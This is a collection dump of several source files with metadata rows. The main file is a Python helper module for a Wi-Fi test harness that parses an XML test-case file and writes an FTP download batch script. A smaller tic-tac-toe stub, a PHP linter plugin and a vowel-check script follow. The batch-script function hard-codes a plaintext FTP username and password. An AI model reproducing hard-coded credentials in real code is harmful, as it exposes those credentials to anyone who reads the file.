        LogMsg("Test case Operating Channel %s %s" % (parsedChannels[chan][0], parsedChannels[chan][1]))
        if band != "11a" and band != "11na" and band != -1:
            testOperChannel.append(parsedChannels[chan][1])
        elif band != -1:
            testOperChannel.append(parsedChannels[chan][0])
    if band == -1 and ProgName != "P2P":
        VarList.setdefault("TestNA", "Invalid Band. DUT Capable Band is [%s] and Test requires [%s]" % (dutInfoObject.DUTBand, Band))
    LogMsg("Test execution in %s Band and Operating Channel %s" % (band, testOperChannel))
    setattr(testEnvVariables, "Band", band)
    iCount = 1
    for chan in testOperChannel:
        if len(testOperChannel) > 1:
            VarList.setdefault("OPER_CHN_%s"%(iCount), chan)
            iCount = iCount + 1
            # BUG FIX: the original referenced the undefined name OPER_CHN_1
            # here, raising NameError for every multi-channel test; the
            # intent was the first resolved channel.
            VarList.setdefault("OPER_CHN", testOperChannel[0])
        else:
            VarList.setdefault("OPER_CHN", chan)
    return testOperChannel
def FindBandChannel(TestCaseID):
    """
    Finds the band and channel required for the given test case and stores
    them in testEnvVariables / VarList.

    Resolves the test case "Band" against the DUT's capable band via
    bandSelectionList, picks the matching channel column from the test case
    "Channel" entries, derives STAPHY / APUT_Band / STAUT_Band / Band_Legacy
    helper variables, and records the channel(s) on testEnvVariables
    (Channel, and Channel_<i> when several channels are defined).

    Parameters
    ----------
    TestCaseID : str
        Test case node name in the master test-case XML.

    Returns
    -------
    testChannel : list of str or None
        Channels selected for the resolved band, or None when the test case
        defines no channel.
    """
    global ProgName
    LoadBandSelection()
    band = -1
    channel1 = []
    testChannel = []
    # DUT capable band as declared in the DUT info (e.g. "ABGN").
    DUTBAND = "%s" % dutInfoObject.DUTBand
    # Normalize the XML band spelling ("A/G" -> "AG", ...) into a
    # bandSelectionList key fragment.
    Band = find_TestcaseInfo_Level1(TestCaseID, "Band")
    if Band == "A/G":
        Band = "AG"
    if Band == "A/G/N":
        Band = "AGN"
    if Band == "G/N":
        Band = "GN"
    if Band == "A/N":
        Band = "AN"
    if Band == "A/B":
        Band = "AB"
    # The next two branches are no-ops, kept for symmetry with the list above.
    if Band == "AC":
        Band = "AC"
    if Band == "AD":
        Band = "AD"
    try:
        # Resolve "<test band>:<DUT band>" to the concrete PHY (e.g. "11na").
        band = bandSelectionList["%s:%s" % (Band, dutInfoObject.DUTBand)]
    except KeyError:
        LogMsg("Invalid band information %s" % Band)
    Channel1 = find_TestcaseInfo_Level1(TestCaseID, "Channel").split(",")
    if Channel1[0] == "":
        # Test case defines no channel.
        return
    for chan in range(0, len(Channel1)):
        # Each entry looks like "<chanA>/<chanB>[/<chanC>]"; pick the column
        # matching the resolved band (column 2 appears to be the 60 GHz
        # channel for 11ad, column 1 the 2.4 GHz channel, column 0 the
        # 5 GHz channel -- TODO confirm column order against the XML).
        channel1.append(Channel1[chan].split("/"))
        LogMsg("Test case Channel %s %s" % (channel1[chan][0], channel1[chan][1]))
        if band == "11ad":
            testChannel.append(channel1[chan][2])
        elif band != "11a" and band != "11na" and band != "11ac" and band != -1:
            testChannel.append(channel1[chan][1])
        elif band != -1:
            testChannel.append(channel1[chan][0])
        elif band == -1 and ProgName != "P2P":
            # Unresolvable band: flag the test as not applicable.
            VarList.setdefault("TestNA", "Invalid Band. DUT Capable Band is [%s] and Test requires [%s]" % (dutInfoObject.DUTBand, Band))
        else:
            LogMsg("band = %s and ProgName = %s" % (band,ProgName))
    LogMsg("Test execution in %s Band and Channel %s" % (band, testChannel))
    # Map the resolved PHY onto the station PHY name used by the scripts.
    if band == "11a" or band == "11g":
        VarList.setdefault("STAPHY", "ag")
    elif band == "11b":
        VarList.setdefault("STAPHY", "b")
    elif band == "11na" or band == "11ng":
        VarList.setdefault("STAPHY", "11n")
    elif band == "11ac":
        VarList.setdefault("STAPHY", "11ac")
    elif band == "11ad":
        VarList.setdefault("STAPHY", "11ad")
    # APUT Band for 11n
    # Channels above 35 are treated as 5 GHz. NOTE(review): this raises
    # IndexError when testChannel is empty (unresolved band under P2P) --
    # confirm that case cannot reach this point.
    if int(testChannel[0]) > 35:
        if band == "11ac":
            VarList.setdefault("APUT_Band", "11ac")
            VarList.setdefault("STAUT_Band", "11ac")
            VarList.setdefault("Band_Legacy", "11a")
            VarList.setdefault("Band_LegacyN", "11na")
        else:
            # 5 GHz: choose per DUT capability.
            if DUTBAND == "AN" or DUTBAND == "ABGN":
                VarList.setdefault("APUT_Band", "11na")
                VarList.setdefault("STAUT_Band", "11na")
                VarList.setdefault("Band_Legacy", "11a")
            elif DUTBAND == "A" or DUTBAND == "ABG":
                VarList.setdefault("APUT_Band", "11a")
                VarList.setdefault("STAUT_Band", "11a")
                VarList.setdefault("Band_Legacy", "11a")
    else:
        # 2.4 GHz (or 60 GHz for AD-only DUTs): choose per DUT capability.
        if DUTBAND == "GN" or DUTBAND == "ABGN":
            VarList.setdefault("APUT_Band", "11ng")
            VarList.setdefault("STAUT_Band", "11ng")
            VarList.setdefault("Band_Legacy", "11g")
        elif DUTBAND == "BG" or DUTBAND == "ABG":
            VarList.setdefault("APUT_Band", "11g")
            VarList.setdefault("STAUT_Band", "11g")
            VarList.setdefault("Band_Legacy", "11g")
        elif DUTBAND == "B":
            VarList.setdefault("APUT_Band", "11b")
            VarList.setdefault("STAUT_Band", "11b")
            VarList.setdefault("Band_Legacy", "11b")
        elif DUTBAND == "AD":
            VarList.setdefault("APUT_Band","11ad")
            VarList.setdefault("STAUT_Band","11ad")
            VarList.setdefault("PCPUT_Band","11ad")
    setattr(testEnvVariables, "Band", band)
    iCount = 1
    for chan in testChannel:
        if len(testChannel) > 1:
            # Multiple channels: record each as Channel_<i>, default
            # Channel to the first one.
            setattr(testEnvVariables, "Channel_%s" % (iCount), chan)
            iCount = iCount + 1
            setattr(testEnvVariables, "Channel", testEnvVariables.Channel_1)
        else:
            setattr(testEnvVariables, "Channel", chan)
    # NOTE(review): assumes testEnvVariables predefines Channel_1..Channel_3;
    # otherwise this log line raises AttributeError -- TODO confirm.
    LogMsg("%s %s %s" %(testEnvVariables.Channel_1, testEnvVariables.Channel_2, testEnvVariables.Channel_3))
    return testChannel
def LoadBandSelection():
    """Populate the global bandSelectionList lookup table.

    Keys are "<test case band>:<DUT capable band>" and values are the
    concrete PHY mode to run the test in ("11a", "11b", "11g", "11na",
    "11ng", "11ac" or "11ad").  Entries already present are left untouched
    (setdefault semantics).
    """
    defaults = {
        # DUT mode BG
        "A:BG": "11g", "B:BG": "11b", "G:BG": "11g", "AG:BG": "11g", "AB:BG": "11b",
        # DUT mode A only
        "A:A": "11a", "B:A": "11a", "G:A": "11a", "AG:A": "11a", "AB:A": "11a",
        # DUT mode ABG
        "A:ABG": "11a", "B:ABG": "11b", "G:ABG": "11g", "AG:ABG": "11a", "AB:ABG": "11a",
        # DUT mode B only
        "A:B": "11g", "B:B": "11b", "G:B": "11g", "AG:B": "11g", "AB:B": "11b",
        # DUT mode G only
        "A:G": "11g", "B:G": "11g", "G:G": "11g", "AG:G": "11g", "AB:G": "11b",
        # DUT mode A and B only
        "A:AB": "11a", "B:AB": "11b", "G:AB": "11b", "AG:AB": "11b", "AB:AB": "11a",
        # DUT mode ABGN
        "A:ABGN": "11a", "B:ABGN": "11b", "G:ABGN": "11g", "AG:ABGN": "11a",
        "AB:ABGN": "11a", "AGN:ABGN": "11na", "AN:ABGN": "11na", "GN:ABGN": "11ng",
        # DUT mode GN
        "A:GN": "11g", "B:GN": "11b", "G:GN": "11g", "AG:GN": "11g",
        "AB:GN": "11b", "AGN:GN": "11ng", "AN:GN": "11ng", "GN:GN": "11ng",
        # DUT mode AN
        "A:AN": "11a", "B:AN": "11a", "G:AN": "11a", "AG:AN": "11a",
        "AB:AN": "11a", "AGN:AN": "11na", "AN:AN": "11na", "GN:AN": "11na",
        # N-capable test bands against legacy DUT modes
        "AGN:ABG": "11a", "AGN:BG": "11g", "AGN:B": "11b",
        "AN:ABG": "11a", "AN:BG": "11g", "AN:B": "11b",
        "GN:ABG": "11g", "GN:BG": "11g", "GN:B": "11b",
        # DUT mode AC
        "A:AC": "11a", "AN:AC": "11na", "AC:AC": "11ac",
        "B:BGNAC": "11b", "BG:BGNAC": "11g", "BGN:BGNAC": "11ng",
        # DUT mode AD
        "AD:AD": "11ad",
    }
    for key, phy in defaults.items():
        bandSelectionList.setdefault(key, phy)
def find_TestcaseInfo_Level1(testID, tag):
    """
    Finds the value of the given tag in the master XML file of test case
    info (module-global ``doc``).

    Parameters
    ----------
    testID : str
        Test case node name to search under.
    tag : str
        Child element whose text content is wanted.

    Returns
    -------
    result : str
        The tag's text value, or "" when not found.
    """
    result = ""
    LogMsg("\n|\n|\n| Searching %s for TestID %s" % (tag, testID))
    for node in doc.getElementsByTagName(testID):
        L = node.getElementsByTagName(tag)
        for node2 in L:
            for node3 in node2.childNodes:
                if node3.nodeType == Node.TEXT_NODE:
                    result = node3.nodeValue
                # NOTE(review): this log + return sit INSIDE the child loop,
                # so only the first child of the first <tag> element under
                # the first <testID> node is ever inspected.  Works because
                # minidom places the text node first for <tag>text</tag>,
                # but returns "" if any other node type comes first --
                # confirm this is intentional.
                LogMsg("\n|\n|\n| Found %s = %s" %(tag, result))
                return result
    # No <testID> node (or it has no <tag> children): return the default "".
    LogMsg("\n|\n|\n| Found %s = %s" % (tag, result))
    return result
def check_isNode_Level1(tag):
    """Return 1 if at least one element named *tag* exists in the master
    test-case XML document (module-global ``doc``), else 0.

    Parameters
    ----------
    tag : str
        Element name to look for.

    Returns
    -------
    result : int
        1 when the element exists, 0 otherwise.
    """
    result = 0
    LogMsg("\n|\n|\n| Searching for Node %s" % tag)
    # Any match is enough; the loop only flips the flag.
    # (Removed an unused local that re-queried the same tag on each hit.)
    for node in doc.getElementsByTagName(tag):
        LogMsg("Node exsits")
        result = 1
    LogMsg(" Match for %s = %s" %(tag, result))
    return result
def find_STAFile(testID, tag):
    """
    Finds the DUT/STA file name for the given test case.

    Looks under <testID>/<tag>: a plain <_Value> child wins; otherwise the
    child matching the DUT type (WPA2-Personal / WPA2-Enterprise, the
    latter narrowed by the DUT's EAP method) supplies the value.  A result
    of "NA" marks the test as not applicable via VarList["TestNA"].

    Parameters
    ----------
    testID : str
    tag : str

    Returns
    -------
    result : str
        The file name, "" when nothing matched, or "NA".
    """
    result = ""
    LogMsg("\n|\n|\n| Searching DUT File for TestID %s" % (testID))
    for node in doc.getElementsByTagName(testID):
        L = node.getElementsByTagName(tag)
        LogMsg("Node1 = %s" % node.nodeName)
        for node2 in L:
            LogMsg("----Node2 = %s" % node2.nodeName)
            for node3 in node2.childNodes:
                # Unconditional value: stop scanning this <tag> element.
                if node3.nodeName == "_Value":
                    LogMsg('--------Found %s' % node3.firstChild.nodeValue)
                    result = node3.firstChild.nodeValue
                    break
                else:
                    LogMsg("--------Node3 = %s" % node3.nodeName)
                    # Both conditions compare nodeName: the child must be the
                    # WPA2-Personal entry AND match the configured DUT type.
                    if node3.nodeName == "WPA2-Personal" and node3.nodeName == dutInfoObject.DUTType:
                        LogMsg("------------Node4 Personal= %s" % node3.firstChild.nodeValue)
                        result = node3.firstChild.nodeValue
                        break
                    elif node3.nodeName == "WPA2-Enterprise" and node3.nodeName == dutInfoObject.DUTType:
                        # Enterprise entries are keyed one level deeper by
                        # the DUT's EAP method.
                        for node4 in node3.childNodes:
                            LogMsg("------------Node4. = %s" % node4.nodeName)
                            for node5 in node4.childNodes:
                                if node5.nodeName == dutInfoObject.DUTEAPMethod:
                                    LogMsg("------------Node5. = %s" %node5.firstChild.nodeValue)
                                    result = node5.firstChild.nodeValue
    if result == "NA":
        LogMsg("\n The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
        VarList.setdefault("TestNA", "The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
    LogMsg("\n|\n|\n| Found DUT File -%s-" % (result))
    return result
def find_TestbedFile(testID):
    """
    Finds the testbed file name for the given test case.

    Looks under <testID>/<TestbedFile>: a <_Value> child wins; otherwise a
    non-'0' alphanumeric text node, or the child element matching the DUT
    type, supplies the value.  A result of "NA" marks the test as not
    applicable via VarList["TestNA"].

    Parameters
    ----------
    testID : str

    Returns
    -------
    result : str
        The file name, "" when nothing matched, or "NA".
    """
    result = ""
    LogMsg("\n|\n|\n| Searching Testbed File for TestID %s" % (testID))
    for node in doc.getElementsByTagName(testID):
        L = node.getElementsByTagName("TestbedFile")
        LogMsg("Node1 = %s" % node.nodeName)
        for node2 in L:
            LogMsg("----Node2 = %s" % node2.nodeName)
            for node3 in node2.childNodes:
                # Unconditional value: stop scanning this element.
                if node3.nodeName == "_Value":
                    LogMsg('--------Found %s' % node3.firstChild.nodeValue)
                    result = node3.firstChild.nodeValue
                    break
                # NOTE(review): the else below belongs to THIS if, not the
                # one above -- a text node that is alphanumeric but '0' is
                # skipped, anything non-text falls through to the DUT-type
                # comparison.
                if node3.nodeType == Node.TEXT_NODE and node3.nodeValue.isalnum() == True:
                    LogMsg('--------Found -%s-' % node3.nodeValue)
                    if node3.nodeValue == '0':
                        continue
                    else:
                        result = node3.nodeValue
                        break
                else:
                    LogMsg("--------Node3 = %s" % node3.nodeName)
                    if node3.nodeName == dutInfoObject.DUTType:
                        LogMsg("------------Node4 = %s" % node3.firstChild.nodeValue)
                        result = node3.firstChild.nodeValue
                        break
    if result == "NA":
        LogMsg("\n The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
        VarList.setdefault("TestNA", "The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
    LogMsg("\n|\n|\n| Found Testbed File -%s-" % (result))
    return result
def find_Supplicant(testID, tag, category):
    """
    Finds the supplicant value for the given test case.

    Looks under <testID>/<Supplicant>/<tag> for a child named *category*.
    A result of "NA" marks the test as not applicable via
    VarList["TestNA"].

    Parameters
    ----------
    testID : str
    tag : str
    category : str
        DUT category child element to match.

    Returns
    -------
    result : str
        The supplicant value, "" when nothing matched, or "NA".
    """
    result = ""
    LogMsg("\n|\n|\n| Searching Supplicant for TestID %s" % (testID))
    for node in doc.getElementsByTagName(testID):
        L = node.getElementsByTagName("Supplicant")
        LogMsg("Node1 = %s" %node.nodeName)
        # NOTE(review): raises IndexError when the test case has no
        # <Supplicant> element -- confirm every caller's XML defines one.
        L = L[0].getElementsByTagName(tag)
        for node2 in L:
            LogMsg("----Node2 = %s" % node2.nodeName)
            for node3 in node2.childNodes:
                if node3.nodeName == category:
                    LogMsg("------------Node4 Personal= %s" %node3.firstChild.nodeValue)
                    result = node3.firstChild.nodeValue
                    if result == "NA":
                        LogMsg("\n The test %s is not applicable for DUT category %s" % (testID, category))
                        VarList.setdefault("TestNA", "The test %s is not applicable for DUT category %s" % (testID, category))
            # Only the first <tag> element is consulted.
            break
    LogMsg("\n|\n|\n| Found Supplicant -%s-" % (result))
    return result
def find_Server(testID, tag):
    """Look up a <Server> child value for a test case.

    Walks the master test-case XML (module-global ``doc``), finds <Server>
    elements under *testID* and returns the text of the first child named
    *tag* within each ("" when nothing matched).
    """
    result = ""
    LogMsg("\n|\n|\n| Searching Server for TestID %s" % (testID))
    for case_node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" % case_node.nodeName)
        for server_node in case_node.getElementsByTagName("Server"):
            LogMsg("----Node2 = %s" %server_node.nodeName)
            for child in server_node.childNodes:
                if child.nodeName != tag:
                    continue
                LogMsg("------------Node4 = %s" %child.firstChild.nodeValue)
                result = child.firstChild.nodeValue
                break
    LogMsg("\n|\n|\n| Found server File -%s-" % (result))
    return result
def find_SubsServer(testID, tag):
    """Look up a <SubscriptionServer> child value for a test case.

    Walks the master test-case XML (module-global ``doc``), finds
    <SubscriptionServer> elements under *testID* and returns the text of
    the first child named *tag* within each ("" when nothing matched).
    """
    result = ""
    LogMsg("\n|\n|\n| Searching Subscription Server for TestID %s" % (testID))
    for case_node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" % case_node.nodeName)
        for subs_node in case_node.getElementsByTagName("SubscriptionServer"):
            LogMsg("----Node2 = %s" %subs_node.nodeName)
            for child in subs_node.childNodes:
                if child.nodeName != tag:
                    continue
                LogMsg("------------Node4 = %s" %child.firstChild.nodeValue)
                result = child.firstChild.nodeValue
                break
    LogMsg("\n|\n|\n| Found Subscription server File -%s-" % (result))
    return result
# PMF (Protected Management Frames) specific helpers
def find_WLANTestFile(testID, tag):
    """Look up the WLAN tester file for a test case (PMF specific).

    Walks the master test-case XML (module-global ``doc``), finds <tag>
    elements under *testID* and returns the text of their first <_Value>
    child ("" when nothing matched).
    """
    result = ""
    LogMsg("\n|\n|\n| Searching WLAN Tester File for TestID %s" % (testID))
    for case_node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" % case_node.nodeName)
        for tag_node in case_node.getElementsByTagName(tag):
            LogMsg("----Node2 = %s" % tag_node.nodeName)
            for child in tag_node.childNodes:
                if child.nodeName != "_Value":
                    continue
                LogMsg("------------Node4 = %s" % child.firstChild.nodeValue)
                result = child.firstChild.nodeValue
                break
    LogMsg("\n|\n|\n| Found WLAN Tester File -%s-" % (result))
    return result
def findSecurity(testID, tag):
    """
    Reads the security settings (KeyMgmt / Encryption / Passphrase) for
    the given test case and records them in VarList ("Keymgnt",
    "keymgmttpye", "encpType", "passphrase").

    WPA2-Ent key management is kept as-is for enterprise DUTs and
    downgraded to WPA2-PSK otherwise; any other key management gets a
    "-PSK" suffix.

    Parameters
    ----------
    testID : str
    tag : str

    Returns
    -------
    None
        Side effects only; ``result`` is used just for logging.
    """
    result = ""
    LogMsg("\n|\n|\n| Searching Security Info for TestID %s" % (testID))
    for node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" %node.nodeName)
        L = node.getElementsByTagName(tag)
        for node2 in L:
            LogMsg("----Node2 = %s" % node2.nodeName)
            for node3 in node2.childNodes:
                if node3.nodeName == "KeyMgmt":
                    LogMsg("------------Security Info= %s" % node3.firstChild.nodeValue)
                    result = node3.firstChild.nodeValue
                    if result == "WPA2-Ent":
                        if dutInfoObject.DUTType == "WPA2-Enterprise":
                            # Enterprise DUT: keep the enterprise key mgmt.
                            VarList.setdefault("Keymgnt", node3.firstChild.nodeValue)
                            VarList.setdefault("keymgmttpye", "%s" % ("WPA2"))
                        else:
                            # Non-enterprise DUT: fall back to WPA2-PSK.
                            VarList.setdefault("Keymgnt", "%s" % ("WPA2-PSK"))
                            VarList.setdefault("keymgmttpye", "%s" % ("WPA2"))
                    else:
                        # e.g. "WPA2" -> "WPA2-PSK".
                        VarList.setdefault("Keymgnt", "%s-%s" % (node3.firstChild.nodeValue, "PSK"))
                        VarList.setdefault("keymgmttpye", node3.firstChild.nodeValue)
                elif node3.nodeName == "Encryption":
                    LogMsg("------------Security Info= %s" % node3.firstChild.nodeValue)
                    result = node3.firstChild.nodeValue
                    VarList.setdefault("encpType", node3.firstChild.nodeValue)
                elif node3.nodeName == "Passphrase":
                    LogMsg("------------Security Info= %s" %node3.firstChild.nodeValue)
                    result = node3.firstChild.nodeValue
                    VarList.setdefault("passphrase", node3.firstChild.nodeValue)
    LogMsg("\n|\n|\n| Found Security Info -%s-" % (result))
def findPMFCap(testID, tag):
    """Extract PMF (Protected Management Frames) capabilities for a test case.

    Reads the DUT_PMFCap / PMFCap1 / PMFCap2 / PMFCap3 children of the
    *tag* element under *testID* in the master XML and records each value
    in VarList under the same name.  Returns None (side effects only).
    """
    # nodeName -> log-message format; doubles as the set of capability
    # entries that get recorded.
    cap_log_format = {
        "DUT_PMFCap": "------------DUT PMF Cap= %s",
        "PMFCap1": "------------Testbed PMF Cap1= %s",
        "PMFCap2": "------------Testbed PMF Cap2= %s",
        "PMFCap3": "------------Testbed PMF Cap3= %s",
    }
    LogMsg("\n|\n|\n| Searching PMF Capability for TestID %s" % (testID))
    for case_node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" % case_node.nodeName)
        for tag_node in case_node.getElementsByTagName(tag):
            LogMsg("----Node2 = %s" % tag_node.nodeName)
            for child in tag_node.childNodes:
                fmt = cap_log_format.get(child.nodeName)
                if fmt is None:
                    continue
                value = child.firstChild.nodeValue
                LogMsg(fmt % value)
                VarList.setdefault(child.nodeName, value)
def get_ASD_framerate(ASDvalue):
    """Convert an ASD throughput value (Mbps) into a frames/second rate.

    The expected traffic is padded ~30% above the nominal throughput, and
    each frame carries a 1000-byte payload (hard-coded in the traffic
    scripts), so rate = value * 1.3 * 1e6 / (1000 * 8) frames/s.

    Returns the rate formatted as a string with two decimal places.
    """
    # ~30% headroom over the nominal throughput value.
    headroom = 0.3
    frames_per_sec = (float(ASDvalue) * (1 + headroom) * 1000000) / (1000 * 8)
    return "{:.2f}".format(frames_per_sec)
def find_ASD_threshold_values(testID, tag):
    """Load ASD throughput thresholds for the DUT's device category.

    Selects the child element of *tag* matching the DUT's ASD device type
    (dutInfoObject.ASD: "1"=Handsets ... "8"=ClientCard), records every
    threshold in VarList, and additionally stores the equivalent frame
    rate under "FrameRate_<name>".

    Returns 1 when at least one threshold was found, "" otherwise.
    """
    # ASD device-type code -> element name in the test-case XML.
    asd_device_names = {
        "1": "Handsets",
        "2": "TV",
        "3": "Printer",
        "4": "SetTopBox",
        "5": "MobileAP",
        "6": "Audio",
        "7": "NwCamera",
        "8": "ClientCard",
    }
    result = ""
    LogMsg("\n|\n|\n| Searching ASD Throughput values for TestID %s" % (testID))
    for case_node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" % case_node.nodeName)
        tag_nodes = case_node.getElementsByTagName(tag)
        asd_type = getattr(dutInfoObject, "ASD")
        device_tag = asd_device_names.get(asd_type, "")
        LogMsg(" Test Running ASD -%s-%s- " % (asd_type, device_tag))
        for tag_node in tag_nodes:
            for device_node in tag_node.childNodes:
                if device_node.nodeName != device_tag:
                    continue
                for entry in device_node.childNodes:
                    if entry.nodeName == "#text":
                        continue
                    value = entry.firstChild.nodeValue
                    LogMsg("------------Node4. = %s %s" % (entry.nodeName, value))
                    VarList.setdefault(entry.nodeName, value)
                    # Also store the matching frame rate for this threshold.
                    VarList.update({"FrameRate_" + entry.nodeName: get_ASD_framerate(value)})
                    result = 1
    LogMsg("\n|\n|\n| Found ASD Throughput values -%s-" % (result))
    return result
def find_throughput_values(testID, tag):
    """Load throughput threshold values for the current test band.

    Maps testEnvVariables.Band onto the band column used by the test-case
    XML (A / G / B / AC), records every threshold found under that column
    in VarList, and returns 1 when at least one value was found ("" when
    none).
    """
    # Resolved PHY -> band column name in the test-case XML.
    band_to_tag = {
        "11a": "A", "11na": "A",
        "11g": "G", "11ng": "G",
        "11b": "B",
        "11ac": "AC",
    }
    result = ""
    LogMsg("\n|\n|\n| Searching Throughput values for TestID %s" % (testID))
    for case_node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" % case_node.nodeName)
        tag_nodes = case_node.getElementsByTagName(tag)
        bnd = getattr(testEnvVariables, "Band")
        band_tag = band_to_tag.get(bnd, "")
        LogMsg(" Test Running in band -%s-%s- " % (bnd, band_tag))
        for tag_node in tag_nodes:
            LogMsg("----Node2 = %s" % tag_node.nodeName)
            for band_node in tag_node.childNodes:
                if band_node.nodeName != band_tag:
                    continue
                for entry in band_node.childNodes:
                    if entry.nodeName == "#text":
                        continue
                    LogMsg("------------Node4. = %s %s" % (entry.nodeName, entry.firstChild.nodeValue))
                    VarList.setdefault(entry.nodeName, entry.firstChild.nodeValue)
                    result = 1
    LogMsg("\n|\n|\n| Found Throughput values -%s-" % (result))
    return result
def find_stream_threshold_values(testID, tag):
    """Load WMM stream threshold values for a test case.

    Records every non-text child of the *tag* element under *testID* in
    VarList (name -> value) and returns 1 when at least one entry was
    found ("" when none).
    """
    result = ""
    LogMsg("\n|\n|\n| Searching WMM Stream Thrshold values for TestID %s" % (testID))
    for case_node in doc.getElementsByTagName(testID):
        LogMsg("Node1 = %s" %case_node.nodeName)
        for tag_node in case_node.getElementsByTagName(tag):
            LogMsg("----Node2 = %s" %tag_node.nodeName)
            for entry in tag_node.childNodes:
                if entry.nodeName == "#text":
                    continue
                LogMsg("------------Node4. = %s %s" % (entry.nodeName, entry.firstChild.nodeValue))
                VarList.setdefault(entry.nodeName, entry.firstChild.nodeValue)
                result = 1
    LogMsg("\n|\n|\n| Found Throughput values -%s-" % (result))
    return result
def createDownloadLog():
    """
    Writes DownloadLogs.bat, a Windows batch script that downloads the
    sniffer trace for the current run over FTP (via wget) when sniffing
    is enabled in the UCC init file.

    The batch script reads the log directory from a file named "p" into
    %LogPath% and fetches ftp://<sniffer>/sniffer_trace* into
    %LogPath%\\Sniffer.
    """
    downloadLogs = open("DownloadLogs.bat", 'w')
    downloadLogs.write("@@echo off \n")
    # %%T in the written file becomes %T when the .bat runs.
    downloadLogs.write("FOR /F %%T in ('findstr \".\" p') do (\n set LogPath=%%T\n )\n")
    #DUT Log
    #Sniffer Trace
    LogMsg("============================= Init File -%s- Sniffer Flag-%s- Sniffer IP -%s--" % (uccPath+InitFile, ReadMapFile(uccPath+InitFile, "sniffer_enable", "!"), ReadMapFile(uccPath+InitFile, "wfa_console_tg", "!")))
    # Only emit the wget line when sniffing is enabled.
    # NOTE(review): the sniffer IP appears to come from the first
    # "key=value" field of the wfa_sniffer init entry -- confirm format.
    if ReadMapFile(uccPath+InitFile, "sniffer_enable", "!") == "1":
        downloadLogs.write("wget -q -t 1 -T 4 -P %sLogPath%s\Sniffer --ftp-user=wifiuser --ftp-password=asdlinux ftp://%s/sniffer_trace*\n"%("%", "%", ReadMapFile(uccPath+InitFile, "wfa_sniffer", "!").split(',')[0].split('=')[1]))
    downloadLogs.close()
| UTF-8 | Python | false | false | 70,040 | py | 13 | InitTestEnv.py | 7 | 0.558024 | 0.543075 | 0 | 1,827 | 36.33607 | 255 |
amdel2020/Algorithms | 17,377,437,682,294 | e0a877fb855fba1b9242d734e9c0f2fa89e1c0e3 | da7de5e15ca6b8076649c4197a6fdbbaf19e020f | /16.4.py | d2f4fa51598b8f6b29fdb663c61b4f20b09547bc | []
| no_license | https://github.com/amdel2020/Algorithms | 36ad53bc5d5ece95e368438634531d325cc37c05 | 43358c931836a807e1d5383faa6412bc11015fda | refs/heads/master | 2020-03-09T03:05:16.545207 | 2019-10-28T14:46:54 | 2019-10-28T14:46:54 | 128,556,539 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def check_status(grid):
n = len(grid)
# from 0, 0 to 0, n-1
# from 1,0 to 1, n-1
# ...
# from n-1, 0 to 1, n-1
# similarly check column wise
# also check diagonal
# at any point if all are same, then win,
# if end reached, then lose
pass
| UTF-8 | Python | false | false | 278 | py | 143 | 16.4.py | 105 | 0.553957 | 0.510791 | 0 | 11 | 24.272727 | 45 |
tamascsaba/My-Sublime-Backup | 9,483,287,806,282 | 088952653ef080c161bf63900521078aa8049289 | 84e769b87b5c80881f4ea805eac51cd4dea24d1d | /SublimeLinter-php/linter.py | 3902921152560854c9a7b165231699d35bb10085 | [
"MIT"
]
| permissive | https://github.com/tamascsaba/My-Sublime-Backup | 6ccef00bc4464c583231c2b14f5a8fc5dba42cfc | db9e0a7acd043a482e600846cc337c363bc24cb8 | refs/heads/master | 2021-01-24T06:36:56.302803 | 2014-04-17T09:31:11 | 2014-04-17T09:31:11 | 18,873,350 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Ryan Hileman, Aparajita Fishman and Anthony Pidden
# Copyright (c) 2013 Ryan Hileman, Aparajita Fishman and Anthony Pidden
#
# License: MIT
#
"""This module exports the PHP plugin class."""
from SublimeLinter.lint import Linter, util
class PHP(Linter):
"""Provides an interface to php -l."""
syntax = ('php', 'html')
cmd = 'php -l -n -d display_errors=On -d log_errors=Off'
regex = (
r'^(?:Parse|Fatal) (?P<error>error):(\s*(?P<type>parse|syntax) error,?)?\s*'
r'(?P<message>(?:unexpected \'(?P<near>[^\']+)\')?.*) in - on line (?P<line>\d+)'
)
error_stream = util.STREAM_STDOUT
def split_match(self, match):
"""Return the components of the error."""
match, line, col, error, warning, message, near = super().split_match(match)
# message might be empty, we have to supply a value
if match and match.group('type') == 'parse' and not message:
message = 'parse error'
return match, line, col, error, warning, message, near
| UTF-8 | Python | false | false | 1,128 | py | 26 | linter.py | 6 | 0.626773 | 0.621454 | 0 | 36 | 30.333333 | 89 |
Boorneeswari/GUVI_PROGRAMS | 15,582,141,367,507 | a3edb477b1db7082c4043e366a4b88104923367e | ed84a727dfcde9481668d0317ca3b2c80e58ad0f | /set8vow.py | 63d7807658faae3e3d7b9fe1140c06ad720d9a35 | []
| no_license | https://github.com/Boorneeswari/GUVI_PROGRAMS | 2458c47da89a3cf1450b5b20eea7e34fba7dd051 | 0f1648f95064043bba93195062954a0afe67ed66 | refs/heads/master | 2020-03-22T21:15:50.236733 | 2018-10-03T13:05:47 | 2018-10-03T13:05:47 | 140,672,212 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | strr=input()
vow=['a','e','i','o','u','A','E','I','O','U']
for i in range(len(strr)):
if strr[i] in vow:
print("yes")
break
else:
print("no")
| UTF-8 | Python | false | false | 166 | py | 58 | set8vow.py | 58 | 0.457831 | 0.457831 | 0 | 8 | 19.75 | 45 |
TsarSPb/Haustiere | 17,179,869,207,645 | ce3673bef97722cc0ef9f256a56c489580e1363d | 08119ddcc8b273f0dc86a351f2c02d6d03cf8537 | /CMAPSS/support_func.py | b5a29951e12b8f19bd37f79988f6ebde6cc4811e | []
